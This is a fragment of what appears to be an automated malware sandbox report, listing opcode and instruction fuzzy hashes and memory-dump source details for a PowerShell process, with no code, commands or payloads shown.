                                                                                                                                                                                                                        • Instruction ID: cc7403525b9b2355ec86c8950f6ea0c67f2634cf6613bfaa7a6e9067074ab856
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9ff5ca5965585250dfad1a522fb12c8fee0cb1d132eb0d4ec38917ed1960cad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1318231B0990E8FEBA8DB9894617FD76E1EFC8310F410239E41DD32E5DEA85E418781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: da79a84acb5011d538a22878ef06bc7bba5a7bad7ff0d9f8bf7ac3ee92a8a564
                                                                                                                                                                                                                        • Instruction ID: cc5ca0eb0882d9dc6f560fd091cb8814270aa34149f558f672a0372fe5cec38d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da79a84acb5011d538a22878ef06bc7bba5a7bad7ff0d9f8bf7ac3ee92a8a564
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8221C737B0E5990EE721B76DBCA14D97F64DF8627A70903B7E18DC9093D808554AC2A1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: dd458030c49a4fb3f58e6ce36f1bcc3e505150aeb315a9af8a777f4af17e76a9
                                                                                                                                                                                                                        • Instruction ID: cc84aa99c155bfb7f5fb6636c2c1792d4692591c1e42d96e1e6d5d3e306fb14f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd458030c49a4fb3f58e6ce36f1bcc3e505150aeb315a9af8a777f4af17e76a9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C210820B1DA0D0FD7A4AB6C946567A7BD1DFD9210B0506BFD44EC32F2DD59A9428341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 9a78d5d6319da4e7f6c84ed27a359d17b690f31d3794e074a63bde1b2c8311bc
                                                                                                                                                                                                                        • Instruction ID: 8cac9898e1ac66e6a43ddde9792aca300824d3fb3f7a02d088e011b538e1b4b5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a78d5d6319da4e7f6c84ed27a359d17b690f31d3794e074a63bde1b2c8311bc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89219030729E4C8FC7A8EB6CC49896573E2FF9831134606AEE48AC7A71DA64FC41C700
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 9b5e09470b725d3aec1d038a9c638ba8f23c1cc6cae2980fb9da259daa8986ae
                                                                                                                                                                                                                        • Instruction ID: 418b834a9eaa46840fed3635c7cb166823d0cbf9c48ce01c90db9ac1e7a5c2b7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b5e09470b725d3aec1d038a9c638ba8f23c1cc6cae2980fb9da259daa8986ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68015272B1DA0C0BE7689A8C78262BD73D2E7C9670F05033FE08EC3392DE2568134586
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: ad46b3e417b99db0d0da31f66960b309a506424932cc9f57aa36d3d988b7352e
                                                                                                                                                                                                                        • Instruction ID: 6bfe97f07e11d6af20016c7099d7f68fc74df90b59a958cc8d0907bcec84bb3a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad46b3e417b99db0d0da31f66960b309a506424932cc9f57aa36d3d988b7352e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24014072B1DA0C0BE7689A4C78222BC73D2E7C9670F05037FE48EC3392DE6569434586
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 79023c57e2821b309c3c086da6b33cc272b90a02b4345f88997d64f125d29f16
                                                                                                                                                                                                                        • Instruction ID: a62d1f34de7960204f45b137cc5eccda926661efc1c1aa56433f66ba33b1e783
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79023c57e2821b309c3c086da6b33cc272b90a02b4345f88997d64f125d29f16
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55217230609A898FDB95DB28C464F617BE1FF95310F0941E9D04DCB2A2CA65EC81CB40
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7bd7b0fe62206182cbb3bb159d9526bcd97eb2befcb687421a6958a226ab5a88
                                                                                                                                                                                                                        • Instruction ID: db6cad41b582a166693427716de3107a1b5c6a26ab510cfe5bdfd9c000c4cc59
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bd7b0fe62206182cbb3bb159d9526bcd97eb2befcb687421a6958a226ab5a88
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5015272B1DA0C0BE7689A4C68622BC73D2E7C8670B05433FE19EC3392DE2568034586
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                        • Instruction ID: c6d341720b75168737bcbbb658bbc6ed62dea96e630f77678b5119a0e236c73e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10066DE58AC76A5DA36E882CB45
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 1ebd772292d969940bdc96f74c2f17ebf876c0228e1405f4152ee248c4aa3df1
                                                                                                                                                                                                                        • Instruction ID: 5ed4b047a5e18dc74e07724eda4705d93d43cd72d6046f329808c28de8d3401e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ebd772292d969940bdc96f74c2f17ebf876c0228e1405f4152ee248c4aa3df1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAF04C73A0D94C57EF3456A8BC245E87BD1EFC9354F06007AE40CC32A1E6665D49C301